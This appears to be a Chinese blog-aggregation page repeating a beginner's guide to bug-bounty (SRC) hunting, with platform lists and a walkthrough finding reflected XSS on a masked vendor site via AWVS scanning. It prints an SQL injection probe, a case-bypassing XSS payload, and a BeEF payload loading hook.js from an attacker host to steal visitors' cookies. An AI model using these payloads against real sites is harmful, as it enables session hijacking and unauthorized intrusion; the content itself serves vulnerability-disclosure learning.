精华内容
下载资源
问答
  • 初识SRC漏洞平台提交漏洞

    万次阅读 多人点赞 2019-03-08 22:05:31
    1.1 漏洞平台 补天漏洞响应平台:https://butian.360.cn/ 漏洞银行:https://www.bugbank.cn/ 阿里云漏洞响应平台:https://security.alibaba.com/ i春秋SRC部落:https://www.ichunqiu.com/src 腾讯应急响应...

    //由于初学时使用工具较多,不建议对目标进行大批量扫描,手测为主,工具为辅,下文仅作示例,明白大体流程即可,实操为真。

    1.1 漏洞平台

    补天漏洞响应平台:https://www.butian.net/

    漏洞银行:https://www.bugbank.cn/

    阿里云漏洞响应平台:https://security.alibaba.com/

    i春秋SRC部落:https://www.ichunqiu.com/src

    腾讯应急响应中心:https://security.tencent.com/index.php

    网易、百度等等。

     

    1.2 网站情况

    常见漏洞类型:

    XSS、SQL注入、CSRF、权限绕过、文件上传、弱口令、代码执行等等。

     

    发现漏洞方法:

    1. 手工寻找(XSS,SQL注入,CSRF等等)。

    难度系数:⭐⭐⭐⭐  牛逼指数:⭐⭐⭐⭐⭐

    一般漏洞平台上除了刚出的服务厂商,其他大多数很明显的漏洞都被提交过了,手工找有些难度,有些网站在对非法字符的过滤也很到位,在url尝试是否存在sql注入,如 and 1=2 ,网站防护机制对用户一旦出现此类非法字符串,便对访问者ip进行连接重置,一段时间后才能访问。

     

    2. 工具扫描/辅助(AWVS、Nessus、sqlmap等等)

    难度系数:⭐⭐  牛逼指数:⭐⭐⭐

    在漏洞平台上的厂商,同样大部分明显直接的漏洞比较少,再加上有的有防火墙和web服务器配置,很多网站只要’察觉’到一个ip的非正常访问(比如扫描网站),就直接采用连接重置,或者无法访问,对扫描ip墙在外面。所以扫描工具的使用,也有一定条件。

     

    3. 手工寻找+工具扫描/辅助

    难度系数:⭐⭐⭐  牛逼指数:⭐⭐⭐⭐ 实用指数:⭐⭐⭐⭐⭐

    通过工具的辅助,找到漏洞点再结合自身知识利用漏洞,往往事半功倍,很有效果

     

    防护情况案例一:(可能会涉及到什么所以对厂商均打码)

    厂商:

     

    子网站教务系统,页面通过单独窗口实现信息显示,url无法测试。

     

    防护情况案例二:

    厂商

     

    找到asp脚本编写同时有id传参的页面

     

    尝试注入语句

    /video_list.aspx?s_classid=221 and 1=2

    回车

     

    防火墙拦截。

    防护情况案例三:

    厂商:大部分厂商

    即扫描工具扫描,服务器防御灵敏的直接墙掉ip,放宽点的当你扫描一定时候到达一定的时候,重置连接。

     

    1.3 发现/提交漏洞

    厂商

    网址:

     

    发现步骤

    1. 手工寻找

    网页的大部分新闻内容全为静态的内容,无下手之地。

     

    直到

     

    进入后是该网站的一个子网站,熟悉的php,寻找漏洞点

     

    注册:

     

    在手工找不到可能存在的漏洞点,尝试工具扫描

    //2021年注:由于19年刚接触使用工具较多,现阶段原则上是不允许批量漏扫工具对网站进行扫描,多以手工加漏洞验证为主。

    //以下示例仅熟悉流程即可,勿学博主用工具直接扫!!!!!!。勿学博主用工具直接扫!!!!!!

    //手工测试可对url进行burp的xss语句检测即可。

     

    使用工具(AWVS)进行站点扫描

    幸运的是,该站点对扫描没有进行设置防御,

    扫到该站点的目录

    其中Forbidden是权限不够无法访问,但是文件存在。

     

    接下来,很明显的看到了极有可能是后台admin目录

    不幸的是,能访问,文件也存在,无回显内容

     

    一片空白,继续换下一个思路

    查看是否存在漏洞。

    其中显目的第一个 Cross Site Scripting (XSS)

    寻找到这三个漏洞点

     

     

    进入直接弹出对话框

    接下来看是什么地方存在漏洞点:

     

    渗透测试XSS语句

    '%22()%26%25<acx><ScRiPt%20>prompt(931058)</ScRiPt>&system=ask&url=e

    经过简化

    %22 是url编码后的,原数据为 ” ,一个双引号,用于对html元素属性进行结束

     

    效果等同于:"><ScRiPt >alert(123)</ScRiPt>

     

    这里<acx><ScRiPt%20>prompt(931058)</ScRiPt> script采用了大小写重复,常用的绕过方法。其中prompt(931058) 是js中与用户交互的提示框,标题就为931058.

    其中prompt(931058)是工具的测试语句,换成熟悉的alert(‘XSS’) 便明显很多。

     

    这也能说明当右键编辑http请求的时候会弹出对话框。

     

    知道漏洞点漏洞原理后,找到漏洞点:

     

    /index.php/core/uploader-image_cut?module=item&system=ask&url=e

     

     

    其中/index.php/core为上文的注册页面,手工注册是打不开的,这也说明了工具利用的重要性。

    利用测试语句测试漏洞的存在

     

    漏洞是存在的,单单的弹窗无法提现出此漏洞的作用,

     

    接下来利用XSS漏洞

     

    利用工具:beef (kali下的xss平台)

     

    利用步骤:

     

    1. beef工具平台开启

     

     

    Kali ip:192.168.88.149

     

    2. 制造XSS利用链接:

    ’"()<acx><script src="http://192.168.88.149:3000/hook.js"> </script>

     

     

    3. 访问者访问

    Win10

    回车后,直观上网页无反应

     

    4. 查看beef平台

     

    可以看到ip,操作系统,系统软件的配置

    重要的在下面

     

    拿到访问者的访问cookie,可通过改包修改cookie登录访问者用户。

     

    到此结束,没有进一步的渗透(还不会高级的)。

     

    下面为漏洞提交的页面

     

     

     

    1.4 思路总结

    1. 学会工具和手工结合,会有意外收获。

    2. 常规注入点,漏洞点别放过。

    3. 发现漏洞,需测试漏洞的存在性(别破坏网站的完整)

    4. 漏洞利用,进一步提现漏洞的价值性,在提交的时候需要有漏洞利用过程截图等。

    5. 最后提出解决方案,完事。

    不做破坏!授权测试!

    展开全文
  • 1漏洞平台 2网站情况 3发现/提交漏洞 4思路总结 1漏洞平台 漏洞银行 https://www.bugbank.cn/ 漏洞盒子 https://www.vulbox.com/ i春秋SRC部落 https://www.ichunqiu.com/src 补天漏洞响应平台 ...

    目录

    1 漏洞平台

    2 网站情况

    3 发现/提交漏洞

    4 思路总结


    漏洞平台

    漏洞银行

    https://www.bugbank.cn/

    漏洞盒子

    https://www.vulbox.com/

    i春秋SRC部落

    https://www.ichunqiu.com/src

    补天漏洞响应平台

    https://butian.360.cn/

    腾讯安全应急响应中心

    http://security.tencent.com/

    网易安全中心

    http://aq.163.com/

    京东安全应急响应中心

    http://security.jd.com/

    百度安全响应中心

    http://sec.baidu.com/

    阿里巴巴集团安全应急响应中心

    http://security.alibaba.com/

    新浪安全应急响应中心

    http://sec.sina.com.cn/

    金山安全应急响应中心

    http://sec.kingsoft.com/

    乌云漏洞报告平台

    http://www.wooyun.org

    360库带计划

    http://loudong.360.cn

    国家信息安全漏洞共享平台

    http://www.cnvd.org.cn/

    蚂蚁金服安全响应中心

    https://security.alipay.com/

    去哪儿网安全应急响应中心

    http://security.qunar.com/

    银联安全应急响应中心

    https://security.unionpay.com/

    同程安全应急响应中心

    https://sec.ly.com/bugs

     

     

    网站情况

    常见漏洞类型:

    XSS、SQL注入、CSRF、权限绕过、文件上传、弱口令、代码执行等等。

     

    发现漏洞方法:

    1. 手工寻找(XSS,SQL注入,CSRF等等)。

    难度系数:⭐⭐⭐⭐  牛逼指数:⭐⭐⭐⭐⭐

    一般漏洞平台上除了刚出的服务厂商,其他大多数很明显的漏洞都被提交过了,手工找有些难度,有些网站在对非法字符的过滤也很到位,在url尝试是否存在sql注入,如 and 1=2 ,网站防护机制对用户一旦出现此类非法字符串,便对访问者ip进行连接重置,一段时间后才能访问。

     

    2. 工具扫描/辅助(AWVS、Nessus、sqlmap等等)

    难度系数:⭐⭐  牛逼指数:⭐⭐⭐

    在漏洞平台上的厂商,同样大部分明显直接的漏洞比较少,再加上有的有防火墙和web服务器配置,很多网站只要’察觉’到一个ip的非正常访问(比如扫描网站),就直接采用连接重置,或者无法访问,对扫描ip墙在外面。所以扫描工具的使用,也有一定条件。

     

    3. 手工寻找+工具扫描/辅助

    难度系数:⭐⭐⭐  牛逼指数:⭐⭐⭐⭐ 实用指数:⭐⭐⭐⭐⭐

    通过工具的辅助,找到漏洞点再结合自身知识利用漏洞,往往事半功倍,很有效果

     

    防护情况案例一:(可能会涉及到什么所以对厂商均打码)

    厂商:

     

    子网站教务系统,页面通过单独窗口实现信息显示,url无法测试。

     

    防护情况案例二:

    厂商

     

    找到asp脚本编写同时有id传参的页面

     

    尝试注入语句

    /video_list.aspx?s_classid=221 and 1=2

    回车

     

    防火墙拦截。

    防护情况案例三:

    厂商:大部分厂商

    即扫描工具扫描,服务器防御灵敏的直接墙掉ip,放宽点的当你扫描一定时候到达一定的时候,重置连接。

     

    发现/提交漏洞

    厂商

    网址:

     

    发现步骤

    1. 手工寻找

    网页的大部分新闻内容全为静态的内容,无下手之地。

    直到

     

    进入后是该网站的一个子网站,熟悉的php,寻找漏洞点

     

    注册:

     

    在手工找不到可能存在的漏洞点,尝试工具扫描

    使用工具(AWVS)进行站点扫描

    幸运的是,该站点对扫描没有进行设置防御,

    扫到该站点的目录

    其中Forbidden是权限不够无法访问,但是文件存在。

    接下来,很明显的看到了极有可能是后台admin目录

    不幸的是,能访问,文件也存在,无回显内容

    一片空白,继续换下一个思路

    查看是否存在漏洞。

    其中显目的第一个 Cross Site Scripting (XSS)

    寻找到这三个漏洞点

     

     

    进入直接弹出对话框

    接下来看是什么地方存在漏洞点:

     

    渗透测试XSS语句

    '%22()%26%25<acx><ScRiPt%20>prompt(931058)</ScRiPt>&system=ask&url=e

    经过简化

    %22 是url编码后的,原数据为 ” ,一个双引号,用于对html元素属性进行结束

    效果等同于:"><ScRiPt >alert(123)</ScRiPt>

    这里<acx><ScRiPt%20>prompt(931058)</ScRiPt> script采用了大小写重复,常用的绕过方法。其中prompt(931058) 是js中与用户交互的提示框,标题就为931058.

    其中prompt(931058)是工具的测试语句,换成熟悉的alert(‘XSS’) 便明显很多。

    这也能说明当右键编辑http请求的时候会弹出对话框。

    知道漏洞点漏洞原理后,找到漏洞点:

    /index.php/core/uploader-image_cut?module=item&system=ask&url=e

    其中/index.php/core为上文的注册页面,手工注册是打不开的,这也说明了工具利用的重要性。

    利用测试语句测试漏洞的存在

    漏洞是存在的,单单的弹窗无法提现出此漏洞的作用,

    接下来利用XSS漏洞

    利用工具:beef (kali下的xss平台)

    利用步骤:

    1. beef工具平台开启

    Kali ip:192.168.88.149

     

    2. 制造XSS利用链接:

    ’"()<acx><script src="http://192.168.88.149:3000/hook.js"> </script>

     

    3. 访问者访问

    Win10

    回车后,直观上网页无反应

     

    4. 查看beef平台

    可以看到ip,操作系统,系统软件的配置

    重要的在下面

    拿到访问者的访问cookie,可通过改包修改cookie登录访问者用户。

    到此结束,没有进一步的渗透(还不会高级的)。

    下面为漏洞提交的页面

     

     

    思路总结

    1. 学会工具和手工结合,会有意外收获。

    2. 常规注入点,漏洞点别放过。

    3. 发现漏洞,需测试漏洞的存在性(别破坏网站的完整)

    4. 漏洞利用,进一步提现漏洞的价值性,在提交的时候需要有漏洞利用过程截图等。

    5. 最后提出解决方案,完事。

    不做破坏!授权测试!

     

     

    展开全文
  • 漏洞银行https://www.bugbank.cn/漏洞盒子https://www.vulbox.com/i春秋SRC部落https://www.ichunqiu.com/src补天漏洞响应平台https://butian.360.cn/腾讯安全应急响应中心http://security.tencent.com/网易安全中心...

    有些SRC平台及应急响应中心搜不到,这是我收集整理的,后续再添加。


    漏洞银行

    https://www.bugbank.cn/

    漏洞盒子

    https://www.vulbox.com/

    i春秋SRC部落

    https://www.ichunqiu.com/src

    补天漏洞响应平台

    https://butian.360.cn/

    腾讯安全应急响应中心

    http://security.tencent.com/

    网易安全中心

    http://aq.163.com/

    京东安全应急响应中心

    http://security.jd.com/

    百度安全响应中心

    http://sec.baidu.com/

    阿里巴巴集团安全应急响应中心

    http://security.alibaba.com/

    新浪安全应急响应中心

    http://sec.sina.com.cn/

    金山安全应急响应中心

    http://sec.kingsoft.com/

    乌云漏洞报告平台

    http://www.wooyun.org

    360库带计划

    http://loudong.360.cn

    国家信息安全漏洞共享平台

    http://www.cnvd.org.cn/

    蚂蚁金服安全响应中心

    https://security.alipay.com/

    去哪儿网安全应急响应中心

    http://security.qunar.com/

    银联安全应急响应中心

    https://security.unionpay.com/

    同程安全应急响应中心

    https://sec.ly.com/bugs




    展开全文
  • 批量刷漏洞: 01刷指纹->02刷原始漏洞->03刷CMS->04刷指定政府、教育->05刷众测平台->...漏洞平台: 补天、漏洞盒子、CNVD、教育行业漏洞报告平台 批量刷漏洞方法: 1.搜索引擎:...

    批量刷漏洞

    01刷指纹->02刷原始漏洞->03刷CMS->04刷指定政府、教育->05刷众测平台->06刷SRC->07刷国内外、活动

     

    搜索引擎

    百度、google、搜狗、360搜索、必应、钟馗之眼、FOFA、SHODAN

     

    漏洞平台

    补天、漏洞盒子、CNVD、教育行业漏洞报告平台

     

    批量刷漏洞方法

    1.搜索引擎:

    钟馗之眼、FOFA、撒旦

    2.爬虫

    转载于:https://www.cnblogs.com/happystudyhuan/p/11286303.html

    展开全文
  • 补天SRC漏洞数排名

    千次阅读 2019-02-17 20:12:33
    今日(2019.02.17)爬取了补天漏洞平台众测SRC的总漏洞数和已解决漏洞数的数据,下面分享总漏洞数100排名和已解决漏洞数100排名。各大公司诸如BAT、美团等目前都有自己的SRC平台,其他公司及高校大多在补天SRC平台进行...
  • SRC漏洞挖掘之偏门资产收集篇

    千次阅读 2020-05-11 20:15:45
    写这篇文章的目得,就是跟大家分享一下平时我挖src漏洞的一些经验,当自己挖到某个站点的漏洞时,往往就会欣喜若狂的往src平台上提交,得到的结果却是 “漏洞已重复,感谢提交“ ,其实这结果很影响一个刚接触挖洞的...
  • 关于SRC漏洞挖掘的经验

    千次阅读 2020-02-19 11:14:45
    在各大平台,比如漏洞盒子,补天,360众测等等都纷纷成立了安全响应中心,许多的企业在上面入驻,给白帽子们提供了一个很好的平台,避免了黑客利用漏洞而造成损失。 一. 资产收集 在挖掘SRC中,我们首先要做的就是...
  • 3.i春秋漏洞安全响应平台-SRC部落 综合SRC平台-国外 1.Hackone 各大企业SRC 1.YY安全应急响应中心 2.苏宁安全应急响应中心 3.去哪儿安全应急响应中心 4.竞技世界安全应急响应中心 5.金山安全应...
  • 这是某个管理平台,不知道是平台的问题还是二次开发的问题,授权测试过程中发现了这个漏洞,很常见,但由于本人是第一次采取这种利用方式,所以记录一下。 ======================================================...
  • 360漏洞响应平台SRC)推出了“亿万守护计划”。 华章科技助力此次“互联网空间-亿万守护计划”,这里为大家推荐10本互联网安全相关、并收获诸多好评的书籍,希望对大家有帮助,文末也有互动赠书环节,欢迎大家参与...
  • SRC应急安全中心 百度 京东 阿里 腾讯 360 华为 众测平台 先知安全服务平台 补天 APP CVE
  • 最近闲余时间开始在 SRC 应急响应平台和 补天、火线、漏洞盒子 等第三方漏洞平台挖掘漏洞赚点外快,一开始还算运气好尝到了一点小甜头: 但是面对 SRC 这类可能被几百名白帽子同时挖掘过的系统,想要持续挖掘到遗漏...
  • 文章目录前言任意文件下载案例1 某OA系统任意文件下载案例2 ...为了能在竞争激烈的 SRC漏洞平台里面薅到羊毛赚点外快,我在前面一篇文章 SRC众测挖洞之支付逻辑漏洞的奇淫技巧 讲述了支付业务逻辑漏洞的实战技巧,接
  • 干货|SRC漏洞挖掘经验

    2021-05-18 08:50:47
    一开始在几大SRC平台,如顺丰SRC,小米SRC等装了两下,真的不知道从何入手。而且,SRC提交这事从来都是前人吃肉后人喝汤的局面,对于这样的平台,综合考虑自身的实力因素,打算先放弃挖掘这样的SRC。然后我在补天SRC...
  • 360漏洞响应平台SRC)推出了“亿万守护计划”。 MS08067安全实验室携手华章科技助力此次“互联网空间-亿万守护计划”,这里为大家推荐10本互联网安全相关、并收获诸多好评的书籍,希望对大家有帮助,文末有互动...
  • 4月20日,Coremail论客安全应急响应中心(Coremail SRC)正式上线启用,捕获漏洞单个奖金最高5万元现金等...作为面向公众收集安全漏洞信息、安全情报的平台,Coremail SRC旨在联合众多安全专家、白帽子研究员共同发...
  • BugX区块链漏洞平台 http://www.bugx.org/ Gsrc瓜子src https://security.guazi.com/ 区块链安全响应中心 https://dvpnet.io/ CNVD国家信息安全漏洞平台 http://www.cnvd.org.cn/ 漏洞银行:https://www.bugbank.cn/...
  • 在今天下班时分,网易SRC发布了一则言辞极为激烈的声明,指责平台上有白帽子不遵守平台漏洞测试原则,未经授权情况下,擅自公开披露了一例已修复漏洞的细节。 以下为声明全文: 网易安全应急响应中心一直秉承合作、...
  • xss漏洞之——XSS平台搭建

    千次阅读 2020-03-04 13:57:57
    经过测试,如果发现了XSS漏洞,那么我们可以结合一些XSS工具来进行利用。常见的XSS利用工具有下面几个: 1.kali下的beef (1)kali命令行里输入beef-xss,得到一个脚本 <script src=...
  • 对一次SRC平台漏洞挖掘,全程文字描述多一点。 测试范围: XXXXX平台: www.A.com Xxxxxxx平台: www.B.com 本人信息搜集不是很6,我这里直接测他的某个站的主站。所以我决定一个一个测,防止漏过,很多人一般都是...
  • 主要目标是分享一些更快速的刷SRC赏金的自动化挖洞技巧命令和工具协同。使用里面的方法,我们能够快速批量找到可以被利用的子域、api令牌和其它敏感漏洞。 摘要 之前许诺给大家的自动化赏金挖洞技巧,现在来了,我不...
  • WEB漏洞分类

    2021-04-12 09:06:41
    漏洞危害情况 目的不同,选择的路径就不同 漏洞等级划分 ...SRC:逻辑安全 红蓝对抗:涉及权限的高危漏洞 漏洞形势问题 安全形势 由于安全意识整体提升,有些漏洞逐渐减少 测试平台:pikachu phpstudy ...
  • 教育src第一步

    千次阅读 2021-02-17 01:07:40
    文章目录1.寻找测试目标2....平时常见的SRC平台诸如补天、漏洞盒子等, 今天向教育SRC平台进击: 教育行业漏洞报告平台(Beta), 地址https://src.sjtu.edu.cn(邀请码和免邀请码两种注册方式) 可以
  • xmind2020xss漏洞复现

    2021-05-10 21:28:14
    今天看到某数字漏洞平台公布的xmind漏洞,尝试复现一下 一、复现环境 使用软件为xmind2020版本,可以在xmind官网(https://www.xmind.cn/)进行下载 二、复现过程 1.创建一个思维导图,内容中写入payload 2.进入...
  • 开始之前做个自我介绍,我是来自F0tsec团队的Subs,也是刚接触安全没有多久的菜狗,刚趁着安全客推荐的平台活动,尝试了三天漏洞挖掘,我运气挺好的(挖到了四个低危,2个中危,一个严重漏洞),也因此结实了SRC年度...
  • 同程SRC公开的历史漏洞 感谢能够把自家漏洞公开出来学习的同程SRC,原来各位大佬都是这么玩SRC的。 https://sec.ly.com/bugs 2、扫描器学习 Scanners Box是一个集合github平台上的安全行业从业者自研开源扫描器的...
  • SQL注入与SQLmap工具 玄道,从混迹漏洞平台SRC应急响应中心的白帽...
  • 一次src挖掘经历

    2021-01-19 22:02:00
    img src=a οnerrοr=console.log(“xss”) 可以发现在console中执行 2.与人工客服沟通输入xss平台payload成功获取cookie等信息 三、修复方案: 修复建议对用户的输入进行实体转义或标签黑白名单处理 四、...
  • 关于漏洞提交的个人见解

    千次阅读 2020-06-12 15:30:46
    本文章仅以CNVD、CNNVD、CVE三个大型公益平台为例,关于SRC另外再说,主要围绕着漏洞挖掘、如何提交、如何拿到证书以及编号等,问题进行阐述. 关于CVE的阐述: 首先说下国际性质的CVE,个人认为CVE最简单也是最好拿...

空空如也

空空如也

1 2 3 4 5 6
收藏数 103
精华内容 41
关键字:

src漏洞平台